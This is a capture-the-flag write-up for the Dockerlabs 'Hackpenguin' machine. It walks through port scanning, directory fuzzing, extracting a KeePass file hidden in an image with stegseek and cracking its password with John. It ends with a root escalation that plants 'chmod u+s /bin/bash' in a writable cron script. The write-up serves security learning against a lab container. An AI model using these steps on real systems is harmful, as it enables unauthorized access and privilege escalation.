HackpenguinSeptember 21, 2024 Created by Page Difficulty OS El pingüino de Mario Dockerlabs Medium Linux I start with a scan of the open ports nmap -p- -vvv --min-rate 5000 -Pn -sS 172.17.0.2 -oG scan Scanning open ports nmap -p22,80 -sCV 172.17.0.2 -oN ports I access to the website I will perform fuzzing to try to find directories gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt -t 300 Since I do not find anything relevant, I will perform fuzzing to find files gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt -t 500 -x .php,.js,.txt,.html,.py,.sh I access the website penguin.html I download the image and look for hidden chains or files strings penguin.jpg stegseek penguin.jpg I find a file with the extension kdbx. I change its name, I get its hash and I try to get its password mv penguin.jpg.out penguin.kdbx keepass2john penguin.kdbx > hash john --wordlist=/usr/share/wordlist/rockyou.txt hash I use the password found to see the content of the file I find a username and password. I tried to log in with ssh Once inside I find two files. I list the processes that are running on the system ps -aux I observe that the script is executed periodically and that I have write permission on it I add a command to be able to run as root nano script.sh chmod u+s /bin/bash I see that the script has been executed and now I can spawn a terminal as root /bin/bash -p